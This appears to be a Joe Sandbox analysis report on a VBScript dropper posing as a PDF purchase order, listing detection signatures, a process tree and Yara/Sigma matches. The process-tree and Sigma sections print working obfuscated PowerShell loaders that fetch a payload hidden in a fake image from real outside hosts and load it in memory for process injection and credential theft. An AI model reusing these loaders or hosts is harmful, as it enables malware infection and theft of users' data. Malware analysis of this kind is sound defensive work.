Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-DC13112024_pdf.vbs

Overview

General Information

Sample name:PO-DC13112024_pdf.vbs
Analysis ID:1555634
MD5:07213aa47f52b96d0e8aa463a384bcf9
SHA1:d14f3d9f87a233f21a6d3e9a4cffeaba0bef144b
SHA256:069cf757c1829b0ceb918585fca5765b259546b12eb729b1d44b956effa3f290
Tags:vbsuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
.NET source code references suspicious native API functions
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3676 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$ZgBn$Gs$ZgBn$Gg$Zg$v$HM$ZwBz$GQ$ZwBo$HM$Z$Bm$HM$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DE$Mw$0$DE$NQ$n$Cw$I$$n$Gg$d$B0$H$$Og$v$C8$MQ$w$DM$Lg$y$D$$Lg$x$D$$Mg$u$DY$Mg$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$EM$bwBt$G0$YQBu$GQ$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$FM$dQBi$HM$d$By$Gk$bgBn$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Cw$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GM$bwBt$G0$YQBu$GQ$QgB5$HQ$ZQBz$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBD$G8$bgB2$GU$cgB0$F0$Og$6$EY$cgBv$G0$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$GI$YQBz$GU$Ng$0$EM$bwBt$G0$YQBu$GQ$KQ$7$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$FI$ZQBm$Gw$ZQBj$HQ$aQBv$G4$LgBB$HM$cwBl$G0$YgBs$Hk$XQ$6$Do$T$Bv$GE$Z$$o$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$KQ$7$C$$J$B0$Hk$c$Bl$C$$PQ$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C4$RwBl$HQ$V$B5$H$$ZQ$o$Cc$d$Bl$HM$d$Bw$G8$dwBl$HI$cwBo$GU$b$Bs$C4$S$Bv$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bh$Cc$KQ$u$Ek$bgB2$G8$awBl$Cg$J$Bu$HU$b$Bs$Cw$I$Bb$G8$YgBq$GU$YwB0$Fs$XQBd$C$$K$$n$HQ$e$B0$C4$YwBi$G8$awBp$GQ$ag$v$G4$aQBh$G0$LwBz$GQ$YQBl$Gg$LwBz$GY$ZQBy$C8$aQBu$GE$Lw$z$DE$MgBl$Gk$a$Bj$Gk$cg$v$G0$bwBj$C4$d$Bu$GU$d$Bu$G8$YwBy$GU$cwB1$GI$dQBo$HQ$aQBn$C4$dwBh$HI$Lw$v$Do$cwBw$HQ$d$Bo$Cc$L$$g$Cc$M$$n$Cw$I$$n$FM$d$Bh$HI$d$B1$H$$TgBh$G0$ZQ$n$Cw$I$$n$FI$ZQBn$EE$cwBt$Cc$L$$g$Cc$M$$n$Ck$KQB9$H0$';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegAsm.exe (PID: 1220 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • WKOyCvoOlM.exe (PID: 6008 cmdline: "C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • where.exe (PID: 4696 cmdline: "C:\Windows\SysWOW64\where.exe" MD5: 5630411B5F4F453CA575248F7AD4C89F)
              • WKOyCvoOlM.exe (PID: 3720 cmdline: "C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 5380 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 1276JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 1276INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x622e4:$b2: ::FromBase64String(
    • 0x620f5:$b3: ::UTF8.GetString(
    • 0x34241:$s1: -join
    • 0x647f6:$s1: -join
    • 0xebd1:$s3: reverse
    • 0x18a98:$s3: reverse
    • 0x8079e:$s3: reverse
    • 0x873f3:$s3: reverse
    • 0x89412:$s3: reverse
    • 0x94441:$s3: reverse
    • 0x118e7a:$s3: reverse
    • 0x119168:$s3: reverse
    • 0x119882:$s3: reverse
    • 0x11a03b:$s3: reverse
    • 0x1211d7:$s3: reverse
    • 0x1215f1:$s3: reverse
    • 0x122179:$s3: reverse
    • 0x122e26:$s3: reverse
    • 0x14b196:$s3: reverse
    • 0x156a25:$s3: reverse
    • 0x311a0:$s4: +=
    Process Memory Space: powershell.exe PID: 3292JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 3292INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x8e55a:$b2: ::FromBase64String(
      • 0x145fc1:$b2: ::FromBase64String(
      • 0x1475b6:$b2: ::FromBase64String(
      • 0x14f18e:$b2: ::FromBase64String(
      • 0x152144:$b2: ::FromBase64String(
      • 0x2540de:$b2: ::FromBase64String(
      • 0x275eef:$b2: ::FromBase64String(
      • 0x8e36b:$b3: ::UTF8.GetString(
      • 0x145dd2:$b3: ::UTF8.GetString(
      • 0x1473c7:$b3: ::UTF8.GetString(
      • 0x14ef9f:$b3: ::UTF8.GetString(
      • 0x151f55:$b3: ::UTF8.GetString(
      • 0x253eef:$b3: ::UTF8.GetString(
      • 0x275d00:$b3: ::UTF8.GetString(
      • 0x7be03:$s1: -join
      • 0x7e116:$s1: -join
      • 0x189d5e:$s1: -join
      • 0x19a150:$s1: -join
      • 0x1a7225:$s1: -join
      • 0x1aa5f7:$s1: -join
      • 0x1aaca9:$s1: -join

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_3292.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Sigma Signatures

        Spreading

        barindex
        Sigma detected: Powershell download payload from hardcoded c2 list
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer

        System Summary

        barindex
        Sigma detected: Base64 Encoded PowerShell Command Detected
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$ZgBn$Gs$ZgBn$Gg$Zg$v$HM$ZwBz$GQ$ZwBo$HM$Z$Bm$HM$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DE$Mw$0$DE$NQ$n$Cw$I$$n$Gg$d$B0$H$$Og$v$C8$MQ$w$DM$Lg$y$D$$Lg$x$D$$Mg$u$DY$Mg$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I
        Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer
